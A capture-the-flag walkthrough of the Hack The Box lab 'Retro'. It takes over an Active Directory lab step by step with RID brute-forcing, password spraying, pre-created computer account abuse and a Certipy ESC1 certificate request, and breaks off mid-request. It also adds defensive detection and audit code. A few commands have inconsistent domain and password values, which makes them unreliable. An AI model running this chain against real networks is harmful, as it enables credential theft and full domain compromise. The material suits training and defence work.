This post is a walkthrough of the Hack The Box room Retro (originally a VulnLab box).
Hack The Box: Retro - Exploiting Weak Credentials, Pre-Created Computer Accounts, and Certificate Vulnerabilities
Retro is an Easy-rated Windows machine from VulnLabs that offers a fantastic introduction to Active Directory (AD) exploitation, covering weak credential hygiene, pre-created computer account abuse, and certificate template vulnerabilities.
The attack path begins with anonymous LDAP enumeration, revealing a list of domain users through a RID brute-force attack using the default guest account. A simple password spray attack with usernames as passwords yields valid credentials, granting access to network shares. Among these shares, a seemingly innocuous ToDo.txt file provides a critical clue, mentioning outdated finance software and pre-created computer accounts in the domain.
Further enumeration uncovers a neglected computer account with stored credentials, which initially appears useless. However, revisiting NMAP scans reveals a Certificate Authority (CA) running on the Domain Controller. Using Certipy-AD, we discover ESC1 (ESC_TEMPLATE_1), a misconfigured certificate template that allows us to forge a domain administrator certificate, leading to full domain compromise.
This box is an excellent case study in:
Credential spraying & weak password policies
Abandoned pre-created computer accounts
AD CS (Active Directory Certificate Services) exploitation
Stay tuned as we break down each step, from initial enumeration to full domain takeover, demonstrating how overlooked configurations in AD can lead to catastrophic security failures.
Why This Box Matters
Retro highlights real-world risks such as:
- Default & weak credentials (guest access, password reuse)
- Poor credential management (pre-created accounts with hardcoded passwords)
- Certificate template misconfigurations (ESC1 leading to privilege escalation)
Recon - NMAP Scan
sudo nmap -T4 -sVC -Pn 10.129.176.201 -v -oA nmap/all-ports --open
Discovered open port 445/tcp on 10.129.176.201
Discovered open port 139/tcp on 10.129.176.201
Discovered open port 3389/tcp on 10.129.176.201
Discovered open port 135/tcp on 10.129.176.201
Discovered open port 53/tcp on 10.129.176.201
Discovered open port 636/tcp on 10.129.176.201
Discovered open port 3269/tcp on 10.129.176.201
Discovered open port 464/tcp on 10.129.176.201
Discovered open port 593/tcp on 10.129.176.201
Discovered open port 88/tcp on 10.129.176.201
Discovered open port 3268/tcp on 10.129.176.201
Discovered open port 389/tcp on 10.129.176.201
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-02 06:42:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
|_SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
|_SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
|_SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
|_SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.retro.vl
| Issuer: commonName=DC.retro.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-08T01:55:44
| Not valid after: 2025-10-08T01:55:44
| MD5: 002f:85c3:8610:e398:121b:e154:7e2a:6c78
|_SHA-1: dd93:31ff:e6e3:ac83:4ae6:c380:144f:044f:6ca6:0cd1
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-07-02T06:43:28+00:00
|_ssl-date: 2025-07-02T06:44:08+00:00; 0s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-02T06:43:29
|_ start_date: N/A
Items of interest from NMAP:
Right away we can tell this is an Active Directory box because of the ports a domain controller typically exposes: 53 (DNS), 88 (Kerberos), 389 (LDAP) and 636 (LDAPS).
- DC.retro.vl - Domain Controller FQDN / hostname
- commonName=retro-DC-CA - Certificate Services has been installed on the Domain Controller.
- retro.vl - Domain name (shown in the LDAP and RDP service banners)
Go ahead and add the FQDN and hostname to your /etc/hosts file. Note that 'sudo echo ... >> /etc/hosts' does not work as intended: the redirection is performed by your unprivileged shell, not by sudo, and 'echo -n' would leave the file without a trailing newline. Piping through 'tee -a' does the job:
echo '10.129.176.201 DC.retro.vl retro.vl dc' | sudo tee -a /etc/hosts
- Knowing we are dealing with a Domain Controller, we can try to get a list of users using the ‘Guest’ account, if it is enabled.
- NetExec can check for this.
nxc smb dc -u 'guest' -p '' --rid-brute
SMB 10.129.25.17 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.25.17 445 DC [+] retro.vl\guest:
SMB 10.129.25.17 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.25.17 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.129.25.17 445 DC 501: RETRO\Guest (SidTypeUser)
SMB 10.129.25.17 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB 10.129.25.17 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB 10.129.25.17 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.129.25.17 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB 10.129.25.17 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB 10.129.25.17 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB 10.129.25.17 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB 10.129.25.17 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB 10.129.25.17 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB 10.129.25.17 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.25.17 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.25.17 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.25.17 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB 10.129.25.17 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB 10.129.25.17 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.25.17 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.25.17 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.25.17 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.25.17 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.129.25.17 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB 10.129.25.17 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.25.17 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.129.25.17 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.129.25.17 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.129.25.17 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.129.25.17 445 DC 1109: RETRO\tblack (SidTypeUser)
Carve out just the user names from the output.
nxc smb dc -u 'guest' -p '' --rid-brute | grep SidTypeUser | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt
This will give us this small list.
Users
cat users.txt
Administrator
Guest
krbtgt
DC$
trainee
BANKING$
jburley
tblack
We do have two computer accounts listed too: DC$ and BANKING$.
Password Spraying Weak Passwords
Next I used the list of usernames as a list for password spraying with NetExec.
nxc smb dc -u users.txt -p users.txt --no-brute --continue-on-success
SMB 10.129.25.17 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.25.17 445 DC [-] retro.vl\Administrator:Administrator STATUS_LOGON_FAILURE
SMB 10.129.25.17 445 DC [-] retro.vl\DC$:DC$ STATUS_LOGON_FAILURE
SMB 10.129.25.17 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.25.17 445 DC [-] retro.vl\BANKING$:BANKING$ STATUS_LOGON_FAILURE
SMB 10.129.25.17 445 DC [-] retro.vl\jburley:jburley STATUS_LOGON_FAILURE
SMB 10.129.25.17 445 DC [-] retro.vl\tblack:tblack STATUS_LOGON_FAILURE
Credentials are found for the user trainee.
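From the defender's side, this spray leaves a distinctive trace in the DC's Security log: one failed logon (event 4625) per account from a single source address within a few seconds, then a success (4624) for the one account the spray found, while no single account accumulates enough failures to trip lockout. The Python below is an added example, not part of the original walkthrough: it runs that logic over constructed event records (the source addresses and timestamps are made up; the account names are the ones from the spray above) and reports, per source, the distinct accounts that failed and any that then succeeded.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records modelled on Security event log entries a DC writes
# during a spray like the one above: 4625 = failed logon, 4624 = successful
# logon. The attacker address 10.10.14.5 and the 10.0.0.23 workstation are
# made up for this example.
SAMPLE_EVENTS = [
    # (timestamp, event id, target account, source address)
    ("2025-07-02 06:50:01", 4625, "Administrator", "10.10.14.5"),
    ("2025-07-02 06:50:01", 4625, "DC$", "10.10.14.5"),
    ("2025-07-02 06:50:02", 4624, "trainee", "10.10.14.5"),
    ("2025-07-02 06:50:02", 4625, "BANKING$", "10.10.14.5"),
    ("2025-07-02 06:50:03", 4625, "jburley", "10.10.14.5"),
    ("2025-07-02 06:50:03", 4625, "tblack", "10.10.14.5"),
    # One user mistyping their own password twice is noise, not a spray.
    ("2025-07-02 07:10:00", 4625, "jburley", "10.0.0.23"),
    ("2025-07-02 07:10:15", 4625, "jburley", "10.0.0.23"),
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def detect_spray(events, window=timedelta(minutes=5), min_accounts=4):
    """Flag each source address whose failed logons hit at least `min_accounts`
    distinct accounts inside any span of length `window`. A spray is "few
    passwords, many accounts", so the distinct-account count per source is the
    signal; per-account failure counts (what lockout policy watches) stay at 1.
    Successful logons from a flagged source are reported too, because a
    success after a burst of failures is the credential the spray found."""
    by_source = defaultdict(list)
    for ts, event_id, account, source in events:
        by_source[source].append((_ts(ts), event_id, account))

    findings = []
    for source, evs in by_source.items():
        evs.sort()
        failures = [(t, a) for t, e, a in evs if e == 4625]
        # Sliding window over the failures, keeping the largest account set seen.
        best, start = set(), 0
        for end in range(len(failures)):
            while failures[end][0] - failures[start][0] > window:
                start += 1
            accounts = {a for _, a in failures[start:end + 1]}
            if len(accounts) > len(best):
                best = accounts
        if len(best) < min_accounts:
            continue
        first_failure = failures[0][0]
        successes = sorted({a for t, e, a in evs
                            if e == 4624 and t >= first_failure})
        findings.append({
            "source": source,
            "failed_accounts": sorted(best),
            "successes": successes,
        })
    return findings


if __name__ == "__main__":
    for f in detect_spray(SAMPLE_EVENTS):
        print(f"spray from {f['source']}: {len(f['failed_accounts'])} accounts "
              f"failed, then logged in as {f['successes'] or 'nobody'}")
```

Tune window and min_accounts to the environment. On the sample data the attacker address is reported with five failed accounts and the trainee success, while the workstation that failed twice on one account is ignored; the same grouping works on real 4625/4624 exports once the four fields are extracted.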
SMB Share Enumeration.
Now we have domain credentials we can see if there are any shares this user has access to.
nxc smb dc -u trainee -p trainee --shares
SMB 10.129.25.17 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.25.17 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.25.17 445 DC [*] Enumerated shares
SMB 10.129.25.17 445 DC Share Permissions Remark
SMB 10.129.25.17 445 DC ----- ----------- ------
SMB 10.129.25.17 445 DC ADMIN$ Remote Admin
SMB 10.129.25.17 445 DC C$ Default share
SMB 10.129.25.17 445 DC IPC$ READ Remote IPC
SMB 10.129.25.17 445 DC NETLOGON READ Logon server share
SMB 10.129.25.17 445 DC Notes READ
SMB 10.129.25.17 445 DC SYSVOL READ Logon server share
SMB 10.129.25.17 445 DC Trainees READ
Two shares of interest are listed. ‘Notes’ and ‘Trainees’ are not normal shares on a domain controller.
Starting with the ‘Trainees’ folder we can use smbclient to access the share from our attack box.
smbclient //dc/trainees -U 'retro/trainee%trainee'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 23 22:58:43 2023
.. DHS 0 Wed Jun 11 15:17:10 2025
Important.txt A 288 Sun Jul 23 23:00:13 2023
4659711 blocks of size 4096. 1283388 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (3.0 KiloBytes/sec) (average 3.0 KiloBytes/sec)
smb: \>
There’s a file named ‘Important.txt’ in the ‘Trainees’ share! Download the file to your attack box using the ‘get’ command.
Reading the contents of the file ‘Important.txt’.
cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
This is a message from the Admins to all Trainees, basically saying that weak passwords have been implemented to prevent admin headaches! This we already know, since we have found out that the password for trainees is just ‘trainee’.
Moving on to the ‘Notes’ Share. Again we’ll use smbclient to connect and look at the contents.
smbclient //dc/notes -U 'retro/trainee%trainee'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Apr 9 04:12:49 2025
.. DHS 0 Wed Jun 11 15:17:10 2025
ToDo.txt A 248 Sun Jul 23 23:05:56 2023
user.txt A 32 Wed Apr 9 04:13:01 2025
4659711 blocks of size 4096. 1284861 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (2.6 KiloBytes/sec) (average 2.6 KiloBytes/sec)
smb: \> get user.txt
getting file \user.txt of size 32 as user.txt (0.3 KiloBytes/sec) (average 1.5 KiloBytes/sec)
smb: \>
Download the ‘ToDo.txt’ and ‘user.txt’ files.
The ‘user.txt’ file is the user flag to submit to HTB, so moving on.
Reading the ‘ToDo.txt’ file contents.
ToDo.txt Contents:
cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
This is a message from James to Thomas referring to a “pre created computer account”. James also uses the word ‘ancient’, which is possibly a hint to a legacy pre-2000 computer account. These accounts use the computer name as the password: a computer named ‘FS01’, for example, would have the password ‘FS01’ (note the missing $ sign, hence legacy); the BANKING$ / banking step below shows the lowercase form in practice.
Pre2k
NetExec has an option to check for these accounts, so let's give it a go.
nxc ldap dc -u trainee -p trainee -M pre2k
LDAP 10.129.25.17 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:retro.vl) (signing:None) (channel binding:Never)
LDAP 10.129.25.17 389 DC [+] retro.vl\trainee:trainee
PRE2K 10.129.25.17 389 DC Pre-created computer account: BANKING$
PRE2K 10.129.25.17 389 DC [+] Found 1 pre-created computer accounts. Saved to /home/red/.nxc/modules/pre2k/retro.vl/precreated_computers.txt
PRE2K 10.129.25.17 389 DC [+] Successfully obtained TGT for banking@retro.vl
PRE2K 10.129.25.17 389 DC [+] Successfully obtained TGT for 1 pre-created computer accounts. Saved to /home/red/.nxc/modules/pre2k/ccache
With this information we can test the account and see if the password is ‘banking’.
nxc smb dc -u 'banking$' -p banking
SMB 10.129.25.17 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.25.17 445 DC [-] retro.vl\banking$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
You will see the error message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when you have guessed the correct password for a computer account that has not been used yet.
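What the pre2k module found is something a domain administrator can audit directly. The 'Assign this computer account as a pre-Windows 2000 computer' option sets the PASSWD_NOTREQD bit (0x20) in userAccountControl, and an account created that way but never joined keeps a logonCount of 0. The Python below is an added example, not part of the original post or of NetExec: it runs that check over constructed computer objects (DC$ and BANKING$ take their names from the RID brute-force output above; the attribute values and the WS01$ / OLD02$ accounts are made up) and also returns the LDAP filter an admin can run against the domain to list the same accounts.

```python
# Constructed computer objects as an LDAP query would return them (attributes
# sAMAccountName, userAccountControl, logonCount). The names DC$ and BANKING$
# come from the walkthrough; every attribute value here is made up.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "DC$",      "userAccountControl": 532480, "logonCount": 412},
    {"sAMAccountName": "BANKING$", "userAccountControl": 4128,   "logonCount": 0},
    {"sAMAccountName": "WS01$",    "userAccountControl": 4096,   "logonCount": 37},
    {"sAMAccountName": "OLD02$",   "userAccountControl": 4096,   "logonCount": 0},
]

# userAccountControl bits relevant here (values from the AD schema).
PASSWD_NOTREQD = 0x0020             # set by the "pre-Windows 2000 computer" checkbox
WORKSTATION_TRUST_ACCOUNT = 0x1000  # ordinary member computer
SERVER_TRUST_ACCOUNT = 0x2000       # domain controller


def audit_computers(computers):
    """Return one finding per computer account that is either flagged as a
    pre-Windows 2000 account (PASSWD_NOTREQD set, so its password is the
    lowercase name without the trailing '$') or has never logged on
    (logonCount 0), which is what a pre-created account that was never
    joined looks like. Domain controllers are skipped for the logon check."""
    findings = []
    for c in computers:
        uac = c["userAccountControl"]
        reasons = []
        if uac & PASSWD_NOTREQD:
            reasons.append("PASSWD_NOTREQD set (pre-Windows 2000 computer account)")
        if c["logonCount"] == 0 and not (uac & SERVER_TRUST_ACCOUNT):
            reasons.append("never logged on")
        if reasons:
            findings.append({"account": c["sAMAccountName"], "reasons": reasons})
    return findings


def ldap_filter_pre2k():
    """LDAP filter that lists the same accounts straight from the directory:
    computer objects whose userAccountControl has the PASSWD_NOTREQD bit set,
    using the bitwise-AND matching rule OID 1.2.840.113556.1.4.803."""
    return ("(&(objectClass=computer)"
            f"(userAccountControl:1.2.840.113556.1.4.803:={PASSWD_NOTREQD}))")


if __name__ == "__main__":
    for f in audit_computers(SAMPLE_COMPUTERS):
        print(f"{f['account']}: {'; '.join(f['reasons'])}")
    print("LDAP filter:", ldap_filter_pre2k())
```

Accounts flagged this way should be deleted if the machine no longer exists, or re-joined (or have the account reset) so they get a random machine password; until then the account name itself is the credential.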
NetExec can also use Kerberos to authenticate.
nxc smb dc.retro.vl -u 'banking$' -p banking -k
SMB dc.retro.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB dc.retro.vl 445 DC [+] retro.vl\banking$:banking
Generate a TGT and verify we can access the server with the TGT ticket.
nxc smb dc.retro.vl -u 'banking$' -p banking -k --generate-tgt banking_tgt
SMB dc.retro.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB dc.retro.vl 445 DC [+] retro.vl\banking$:banking
SMB dc.retro.vl 445 DC [+] TGT saved to: banking_tgt.ccache
SMB dc.retro.vl 445 DC [+] Run the following command to use the TGT: export KRB5CCNAME=banking_tgt.ccache
export KRB5CCNAME=banking_tgt.ccache
klist
Ticket cache: FILE:banking_tgt.ccache
Default principal: banking$@RETRO.VL
Valid starting Expires Service principal
07/07/25 19:17:30 07/08/25 05:17:30 krbtgt/RETRO.VL@RETRO.VL
renew until 07/08/25 19:17:29
nxc smb dc.retro.vl -u 'banking$' -k --use-kcache --shares
SMB dc.retro.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB dc.retro.vl 445 DC [+] RETRO.VL\banking$ from ccache
SMB dc.retro.vl 445 DC [*] Enumerated shares
SMB dc.retro.vl 445 DC Share Permissions Remark
SMB dc.retro.vl 445 DC ----- ----------- ------
SMB dc.retro.vl 445 DC ADMIN$ Remote Admin
SMB dc.retro.vl 445 DC C$ Default share
SMB dc.retro.vl 445 DC IPC$ READ Remote IPC
SMB dc.retro.vl 445 DC NETLOGON READ Logon server share
SMB dc.retro.vl 445 DC Notes READ
SMB dc.retro.vl 445 DC SYSVOL READ Logon server share
SMB dc.retro.vl 445 DC Trainees READ
OK, with nowhere else to go, I remembered that we have a Certificate Authority running on the server, so this is where I turned my attention next.
ESC1 Vulnerability
certipy-ad find -u banking\$@retro.local -k -target dc.retro.vl -stdout -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: dc.retro.vl.
[!] Use -debug to print a stacktrace
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The DNS query name does not exist: DC.retro.vl.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'retro-DC-CA'
[*] Checking web enrollment for CA 'retro-DC-CA' @ 'DC.retro.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Template Created : 2023-07-23T21:17:47+00:00
Template Last Modified : 2023-07-23T21:18:39+00:00
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Full Control Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Property Enroll : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
[+] User Enrollable Principals : RETRO.VL\Domain Computers
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
From the output of ‘certipy-ad’ there is a vulnerability classed as ‘ESC1’. More information on the types of vulnerabilities can be found here,
and this particular vulnerability is here.
Brief description from the wiki link:
Description
ESC1 is the stereotypical AD CS misconfiguration that can lead directly to privilege escalation. The vulnerability arises when a certificate template is inadequately secured, permitting a low-privileged user to request a certificate and, importantly, specify an arbitrary identity within the certificate’s SAN. This allows the attacker to impersonate any user, including administrators.
So this is what we will be doing in our case.
The vulnerable template is ‘RetroClients’ and the CA is ‘retro-DC-CA’. These two pieces of information, together with the Administrator's SID, will be needed next for certipy-ad.
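Before going further it is worth being precise about which template settings combine into ESC1, because that list is also the checklist for fixing it. The Python below is an added example (my own reimplementation of the conditions Certipy reports, not Certipy's code): it evaluates the RetroClients settings transcribed from the output above alongside two constructed templates that each lack one condition, and shows the changes that close the hole.

```python
from copy import deepcopy

# Principals every domain account belongs to; enrollment rights granted to
# these count as "low-privileged" for ESC1.
LOW_PRIV_PRINCIPALS = {
    "Domain Users", "Domain Computers", "Authenticated Users", "Everyone",
}
# EKUs that let a certificate authenticate to AD (names as Certipy prints them).
AUTH_EKUS = {
    "Client Authentication", "PKINIT Client Authentication",
    "Smart Card Logon", "Any Purpose",
}

# RetroClients is transcribed from the certipy-ad output above; "User" and
# "WebServer" are constructed for contrast and are not from the box.
SAMPLE_TEMPLATES = [
    {"name": "RetroClients", "enabled": True,
     "enrollee_supplies_subject": True,
     "ekus": ["Client Authentication"],
     "requires_manager_approval": False,
     "authorized_signatures_required": 0,
     "enrollment_rights": ["Domain Admins", "Domain Computers", "Enterprise Admins"]},
    {"name": "User", "enabled": True,
     "enrollee_supplies_subject": False,   # CA builds the subject from the AD object
     "ekus": ["Client Authentication", "Secure Email", "Encrypting File System"],
     "requires_manager_approval": False,
     "authorized_signatures_required": 0,
     "enrollment_rights": ["Domain Users"]},
    {"name": "WebServer", "enabled": True,
     "enrollee_supplies_subject": True,    # harmless here: this EKU cannot log on
     "ekus": ["Server Authentication"],
     "requires_manager_approval": False,
     "authorized_signatures_required": 0,
     "enrollment_rights": ["Domain Admins"]},
]


def is_esc1(t, low_priv=LOW_PRIV_PRINCIPALS):
    """All four ESC1 conditions must hold at once: the requester chooses the
    subject (SAN), the certificate can authenticate, nothing gates issuance,
    and a low-privileged principal may enroll."""
    ekus = set(t["ekus"])
    can_auth = not ekus or bool(ekus & AUTH_EKUS)   # an empty EKU list also authenticates
    gated = t["requires_manager_approval"] or t["authorized_signatures_required"] > 0
    low_priv_enroll = bool(set(t["enrollment_rights"]) & low_priv)
    return bool(t["enabled"] and t["enrollee_supplies_subject"]
                and can_auth and not gated and low_priv_enroll)


def esc1_findings(templates):
    """Names of the templates that satisfy every ESC1 condition."""
    return [t["name"] for t in templates if is_esc1(t)]


def harden(t):
    """Copy of the template with the two settings that each close ESC1 on
    their own: the CA builds the subject from AD, and a certificate manager
    must approve issuance. Removing Domain Computers from the enrollment
    rights is the third independent fix."""
    fixed = deepcopy(t)
    fixed["enrollee_supplies_subject"] = False
    fixed["requires_manager_approval"] = True
    return fixed


if __name__ == "__main__":
    print("ESC1:", esc1_findings(SAMPLE_TEMPLATES))
    print("after hardening:", esc1_findings([harden(SAMPLE_TEMPLATES[0])]))
```

On this box the low-privileged enrollment principal is Domain Computers, which is exactly why the pre-created BANKING$ account became the stepping stone: any computer account, however stale, satisfies the last condition.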
NetExec can be used to get the Domain SID and we can just add RID 500 to the end.
nxc ldap dc -u banking -p Password123 -k --get-sid
LDAP dc 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:retro.vl) (signing:None) (channel binding:Never)
LDAP dc 389 DC [+] retro.vl\banking:Password123
LDAP dc 389 DC Domain SID S-1-5-21-2983547755-698260136-4283918172
The Administrator SID will be: S-1-5-21-2983547755-698260136-4283918172-500
Requesting the Administrator's PFX
certipy-ad req -username banking\$@retro.vl -k -ca retro-DC-CA -target dc.retro.vl -template RetroClients -upn administrator@retro.vl -key-size=4096 -dns dc.retro.vl -sid S-1-5-21-2983547755-698260136-4283918172-500
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: dc.retro.vl.
[!] Use -debug to print a stacktrace
[!] DNS resolution failed: The DNS query name does not exist: RETRO.VL.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
